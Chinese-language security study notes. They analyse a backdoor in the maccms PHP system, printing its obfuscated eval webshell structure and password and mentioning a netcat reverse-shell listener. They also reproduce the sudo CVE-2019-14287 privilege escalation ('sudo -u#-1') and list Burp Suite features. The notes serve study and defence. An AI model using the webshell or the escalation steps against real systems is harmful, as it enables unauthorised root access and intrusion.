Maccms后門分析
maccms網站基於php+mysql的系統,易用性、功能良好等優點,用途范圍廣
打開源碼,extend\Qcloud\Sms\Sms.php、extend\upyun\src\Upyun\Api\Format.php是兩個后門(Sms.php和Format.php是后門木馬 二者代碼相同)
<?php
error_reporting(E_ERROR);//報錯
@ini_set('display_errors','Off');
@ini_set('max_execution_time',20000);
@ini_set('memory_limit','256M'); //所有ini_set都是初始化環境
header("content-Type: text/html; charset=utf-8");
$password = "0d41c75e2ab34a3740834cdd7e066d90";//MD5加密的密碼,解密后為WorldFilledWithLove
functions(){
$str =”編碼后的惡意代碼”;
$str = str_rot13($str);
m($str);
}
function m($str){
global $password;
$jj = '';
eval($jj.pack('H*',$str).$jj); //pack('H*',$str)對混淆的php進行解碼,解碼之后進行eval函數處理
}
s();
?>
使用密碼訪問http://127.0.0.1/extend/Qcloud/Sms/Sms.php(訪問Sms.php或Format.php,地址根據自己情況來)
這樣就能看到管理的文件信息
反彈shell(將目標機上的終端或者解析器或shell彈到攻擊者指定的電腦中,需要攻擊者提前監聽端口:使用“nc -lvvp 端口號” l表示本地 vv表示詳細信息 p表示端口)
這樣就能反彈目標機的shell到指定的地址上
Sudo提權漏洞(CVE-2019-14287)復現
Sudo是linux系統命令,用來讓普通賬號以root身份去執行某些命令,如,安裝軟件、查看某些配置文件、關機、重啟等操作
,如果普通賬號需要使用sudo,需要修改配置文件/etc.sudoers,將sudo使用權賦予該賬號。
Sudo提權漏洞是一個安全策略繞過問題去執行某些敏感的命令,CVE編號是CVE-2019-14287,影響的版本是小於1.8.28的版本
復現:
Step1:查看版本 sudo -V
Step2:修改配置文件:vim /etc/sudoers在root ALL=(ALL:ALL)ALL下面添加一行配置代碼
test ALL=(ALL,!root)ALL
第一個all表示該用戶可以在任意地方使用sudo
(ALL,!root)表示明了可以被除了root以外的用戶執行
最后的All表示被允許執行
整體:test用戶可以使用sudo,但是除了root以外的任意用戶去執行命令
注意:需要創建test用戶: useradd test , passwd test
Step3:切換到test用戶,su test ,然后sudo id(查看root的id),發現沒有權限去執行(這是root的權限)
使用如下方法執行我們想執行的命令
sudo -u#數字 命令
數字范圍:-1~4294967295,命令是系統命令
其中數字-1表示root身份
修復方法:更新sudo版本1.8.28之后
總結:該漏洞復現比較雞肋,需要管理員修改配置文件
BurpSuite功能
proxy代理
target目標
spider爬蟲
scanner漏洞掃描
intruder暴力破解
repeater重放/中繼(修改數據包並發送出去,查看回來的數據效果)
sequencer 定序器(分析不可預知的應用程序會話令牌和重要數據項的隨機性的工具)
decoder編解碼
comparer 比較
extender擴展(python、java、php)
其他
Project項目
User用戶